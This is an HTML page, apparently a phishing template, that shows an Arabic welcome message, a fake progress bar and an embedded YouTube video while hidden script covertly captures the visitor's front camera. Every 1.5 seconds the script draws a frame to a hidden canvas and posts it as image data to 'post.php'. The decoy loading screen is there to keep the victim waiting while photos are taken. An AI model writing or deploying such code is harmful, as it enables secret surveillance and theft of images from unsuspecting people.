<!doctype html>
<html>
<head>
 <style>
   .center {
   margin: auto;
   text-align: center;
  }
 h1 {
   color: green;
  }
progress {
   width: 100%;
   height: 30px;
   position: relative;
   border-radius: 5px;
   background-color: #ddd;
  }
  progress::after {
   content: "";
   position: absolute;
   top: 0;
   left: 0;
   width: 0%;
   height: 100%;
   background-color: #4CAF50;
   border-radius: 5px;
   animation: progress-bar 5s infinite;
  }
  @keyframes progress-bar {
   0% {
    width: 0%;
   }
   100% {
    width: 100%;
   }
  }
  </style>
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>

<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};


'use strict';

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 480);
       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
       post(canvasData); }, 1500);
  

}

// Load init
init();

</script>

    <body bgcolor="black">
     <div class="center">
  <h1>أهلاً بك في موقعنا!</h1>
    <progress id="progress-bar" value="0" max="100"></progress>
   <h1>من فضلك انتظر …</h1>
   
           <iframe width="560" height="315" src="https://www.youtube.com/embed/IyERYQScT40" frameborder="0" allowfullscreen></iframe>

     </div>
 <script>
var progressBar = document.getElementById("progress-bar");
  var value = 0;
  var interval = setInterval(function() {
   value += 1;
   progressBar.value = value;
   if (value >= 100) {
    clearInterval(interval);
   }
  }, 50);
  </script>
        
    </body>

</html>
